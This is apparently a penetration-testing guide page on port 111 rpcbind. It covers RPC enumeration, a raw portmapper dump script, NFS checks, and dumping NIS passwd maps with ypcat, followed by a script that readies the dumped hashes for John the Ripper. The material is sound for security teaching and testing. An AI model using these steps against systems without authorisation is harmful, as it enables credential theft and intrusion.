
111/TCP/UDP - Pentesting Portmapper

Basic Information

Portmapper (rpcbind) is the ONC RPC registry on Unix-based systems: every RPC service (NFS, NIS, rusersd, any other rpc-based daemon) registers its program number, version and listening port with it, and clients query it to find them. The port is frequently probed because a single request enumerates the registered services and their ports, which also helps fingerprint the *nix OS.

Default port: 111/TCP/UDP, 32771 in Oracle Solaris

PORT STATE SERVICE
111/tcp open rpcbind

Enumeration

rpcinfo irked.htb #Dump the registered RPC programs, versions, protocols and ports (rpcinfo -p for the portmap v2 view)
nmap -sSUC -p111 192.168.10.1 #TCP SYN and UDP scan of port 111 with default scripts (includes the rpcinfo script)
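The query rpcinfo and nmap's rpcinfo script send is a single PMAPPROC_DUMP call. The following is an added example, not code from the original page: it builds that ONC RPC v2 call by hand (RFC 5531 message framing, RFC 1833 portmap v2 procedure numbers), parses the XDR-encoded reply into (program, version, protocol, port) mappings, and maps well-known program numbers to names. The live query goes over UDP (TCP would additionally need the 4-byte record-marking header). SAMPLE_REPLY is a constructed reply, not captured from a real host; the xid and host arguments are assumptions.

```python
"""Raw PMAPPROC_DUMP against portmapper/rpcbind, equivalent to `rpcinfo -p <host>`."""
import socket
import struct

PMAP_PROG = 100000      # portmapper program number
PMAP_VERS = 2           # portmap v2 (rpcbind also serves v3/v4; v2 is understood everywhere)
PMAPPROC_DUMP = 4       # "list all registrations"
RPC_CALL, RPC_REPLY = 0, 1
MSG_ACCEPTED, SUCCESS = 0, 0
AUTH_NULL = 0

# Well-known RPC program numbers (subset of the IANA rpc assignments).
PROG_NAMES = {
    100000: "portmapper", 100001: "rstatd", 100002: "rusersd",
    100003: "nfs", 100004: "ypserv", 100005: "mountd",
    100007: "ypbind", 100009: "yppasswdd", 100021: "nlockmgr",
    100024: "status",
}
PROTO_NAMES = {6: "tcp", 17: "udp"}


def build_dump_call(xid: int) -> bytes:
    """Encode an RPC CALL for PMAPPROC_DUMP: no arguments, AUTH_NULL cred and verf."""
    return struct.pack(
        ">10I",
        xid, RPC_CALL,
        2,                                # RPC protocol version
        PMAP_PROG, PMAP_VERS, PMAPPROC_DUMP,
        AUTH_NULL, 0,                     # credentials: flavor, body length
        AUTH_NULL, 0,                     # verifier: flavor, body length
    )


def parse_dump_reply(data: bytes, xid: int) -> list:
    """Decode the REPLY header, then the XDR linked list of pmap mappings."""
    r_xid, mtype, rstat = struct.unpack_from(">3I", data, 0)
    if r_xid != xid or mtype != RPC_REPLY:
        raise ValueError("not a reply to our call")
    if rstat != MSG_ACCEPTED:
        raise ValueError("call rejected (MSG_DENIED)")
    off = 12
    _flavor, vlen = struct.unpack_from(">2I", data, off)
    off += 8 + ((vlen + 3) & ~3)          # skip verifier body, XDR-padded to 4 bytes
    (astat,) = struct.unpack_from(">I", data, off)
    off += 4
    if astat != SUCCESS:
        raise ValueError(f"accept_stat {astat}")
    mappings = []
    while True:
        (more,) = struct.unpack_from(">I", data, off)   # XDR optional: 1 = entry follows
        off += 4
        if more == 0:
            break
        prog, vers, prot, port = struct.unpack_from(">4I", data, off)
        off += 16
        mappings.append({"prog": prog, "vers": vers, "port": port,
                         "prot": PROTO_NAMES.get(prot, str(prot)),
                         "name": PROG_NAMES.get(prog, "")})
    return mappings


def rpc_dump(host: str, port: int = 111, timeout: float = 3.0) -> list:
    """Live query over UDP (no record marking needed, unlike TCP)."""
    xid = 0x4B1D0001                       # arbitrary transaction id (assumption)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_dump_call(xid), (host, port))
        data, _ = s.recvfrom(65535)
    return parse_dump_reply(data, xid)


def encode_dump_reply(xid: int, mappings) -> bytes:
    """Encode a reply the way rpcbind would; used only to build the offline sample."""
    out = struct.pack(">6I", xid, RPC_REPLY, MSG_ACCEPTED, AUTH_NULL, 0, SUCCESS)
    for prog, vers, prot, port in mappings:
        out += struct.pack(">5I", 1, prog, vers, prot, port)
    return out + struct.pack(">I", 0)


# Constructed sample (not a real capture): a host exposing rpcbind, NFS, mountd, ypserv, rusersd.
SAMPLE_XID = 0x1234
SAMPLE_REPLY = encode_dump_reply(SAMPLE_XID, [
    (100000, 2, 6, 111), (100000, 2, 17, 111),
    (100003, 3, 6, 2049), (100005, 1, 17, 32768),
    (100004, 2, 17, 33110), (100002, 2, 17, 32772),
])

if __name__ == "__main__":
    import sys
    rows = rpc_dump(sys.argv[1]) if len(sys.argv) > 1 else parse_dump_reply(SAMPLE_REPLY, SAMPLE_XID)
    for m in rows:
        print(f"{m['prog']:>7} {m['vers']:>3} {m['prot']:>4} {m['port']:>6}  {m['name']}")
```

Run it with a host argument for a live dump, or with none to decode the constructed sample. A reply that is MSG_DENIED or a non-SUCCESS accept_stat is surfaced as an error rather than an empty list, so a filtered or unresponsive portmapper is not mistaken for a host with no RPC services.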

RPCBind + NFS

Useful nmap scripts

nfs-ls #List NFS exports and check permissions
nfs-showmount #Like showmount -e
nfs-statfs #Disk statistics and info from NFS share

Useful metasploit modules

scanner/nfs/nfsmount #Scan NFS mounts and list permissions

NIS

Once you have the NIS domain name for the environment (example.org in this case), use ypwhich to confirm which host answers as the NIS server and ypcat to dump maps containing sensitive material, as demonstrated below. Feed the password hashes from passwd.byname into John the Ripper; the cracked passwords can then be used to evaluate system access and privileges.

root@kali:~# apt-get install nis
root@kali:~# ypwhich -d example.org 192.168.10.1
potatohead.example.org
root@kali:~# ypcat -d example.org -h 192.168.10.1 passwd.byname
tiff:noR7Bk6FdgcZg:218:101::/export/home/tiff:/bin/bash
katykat:d.K5tGUWCJfQM:2099:102::/export/home/katykat:/bin/bash
james:i0na7pfgtxi42:332:100::/export/home/james:/bin/tcsh
florent:nUNzkxYF0Hbmk:199:100::/export/home/florent:/bin/csh
dave:pzg1026SzQlwc:182:100::/export/home/dave:/bin/bash
yumi:ZEadZ3ZaW4v9.:1377:160::/export/home/yumi:/bin/bash
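Before feeding the map to John it pays to triage it: passwd.byname lines are already in the passwd format John reads, but not every entry carries a crackable hash and the hash scheme decides the --format flag. The following is an added example, not from the original page or from the NIS tools: it parses ypcat passwd.byname output, classifies each password field (traditional 13-character DES crypt, $1$/$5$/$6$/$2 crypt schemes, shadowed placeholder, locked, or empty), and emits John-ready lines with uid 0 accounts first. SAMPLE_MAP is constructed for the example (the page's first two users plus invented edge cases); the placeholder strings and the "##user" Solaris passwd.adjunct convention are assumptions about the target platform.

```python
"""Triage `ypcat passwd.byname` output for John the Ripper."""
import re

# Constructed sample: the page's tiff/katykat lines plus invented edge cases.
SAMPLE_MAP = """\
tiff:noR7Bk6FdgcZg:218:101::/export/home/tiff:/bin/bash
katykat:d.K5tGUWCJfQM:2099:102::/export/home/katykat:/bin/bash
svc:x:300:100::/export/home/svc:/bin/sh
old:*LK*:301:100::/export/home/old:/bin/sh
guest::302:100::/export/home/guest:/bin/sh
admin:$1$ab12cd34$0123456789abcdefghijkl:0:0:root:/root:/bin/bash
"""

DESCRYPT = re.compile(r"[./0-9A-Za-z]{13}")       # 2-char salt + 11-char DES crypt(3)
CRYPT_IDS = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt", "$2": "bcrypt"}
CRACKABLE = {"descrypt", "md5crypt", "sha256crypt", "sha512crypt", "bcrypt"}


def classify(h: str) -> str:
    """Name the scheme of a passwd password field, or why it cannot be cracked."""
    if h == "":
        return "empty"                     # no password at all: log in directly
    if h == "x" or h.startswith("##"):
        return "shadowed"                  # hash lives in shadow.byname / passwd.adjunct.byname (assumed convention)
    if h.startswith(("*", "!")) or h == "NP":
        return "locked"
    if DESCRYPT.fullmatch(h):
        return "descrypt"
    for prefix, name in CRYPT_IDS.items():
        if h.startswith(prefix):
            return name
    return "unknown"


def parse_map(text: str) -> list:
    """Split passwd-style lines into records tagged with their hash kind."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = line.split(":")
        if len(f) != 7:
            continue                       # not a passwd line (ypcat error text, etc.)
        records.append({"user": f[0], "hash": f[1], "uid": int(f[2]), "gid": int(f[3]),
                        "gecos": f[4], "home": f[5], "shell": f[6], "kind": classify(f[1])})
    return records


def crackable(records: list) -> list:
    """Entries worth cracking; uid 0 first, then ascending uid."""
    return sorted((r for r in records if r["kind"] in CRACKABLE),
                  key=lambda r: (r["uid"] != 0, r["uid"]))


def john_lines(records: list) -> list:
    """passwd-format lines John accepts as-is (user:hash:uid:gid:gecos:home:shell)."""
    return [f"{r['user']}:{r['hash']}:{r['uid']}:{r['gid']}:{r['gecos']}:{r['home']}:{r['shell']}"
            for r in crackable(records)]


def john_formats(records: list) -> list:
    """Distinct John --format values needed; run one john session per format."""
    return sorted({r["kind"] for r in crackable(records)})


def no_password(records: list) -> list:
    """Accounts with an empty password field: try them before cracking anything."""
    return [r["user"] for r in records if r["kind"] == "empty"]


if __name__ == "__main__":
    recs = parse_map(SAMPLE_MAP)
    print("formats:", john_formats(recs), " empty-password:", no_password(recs))
    print("\n".join(john_lines(recs)))
```

Write the john_lines output to a file and run `john --format=descrypt <file>` (and once per other format listed), since John handles one hash type per session. The empty and shadowed categories are the two checks worth making by hand: an empty field is a login without cracking, and a shadowed placeholder means the real hashes may be in a separate map (shadow.byname, or passwd.adjunct.byname on Solaris) that is worth requesting with ypcat as well.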

Master file         Map(s)                         Notes
/etc/hosts          hosts.byname, hosts.byaddr     Contains hostnames and IP details
/etc/passwd         passwd.byname, passwd.byuid    NIS user password file
/etc/group          group.byname, group.bygid      NIS group file
/usr/lib/aliases    mail.aliases                   Details mail aliases

RPC Users

rusersd is an RPC service that reveals which users are logged in to the host, on which terminal and since when. rusers -l queries it (the broadcast lines in the output are the client trying protocol versions 3 and 2).

root@kali:~# apt-get install rusers
root@kali:~# rusers -l 192.168.10.1
Sending broadcast for rusersd protocol version 3...
Sending broadcast for rusersd protocol version 2...
tiff potatohead:console Sep 2 13:03 22:03
katykat potatohead:ttyp5 Sep 1 09:35 14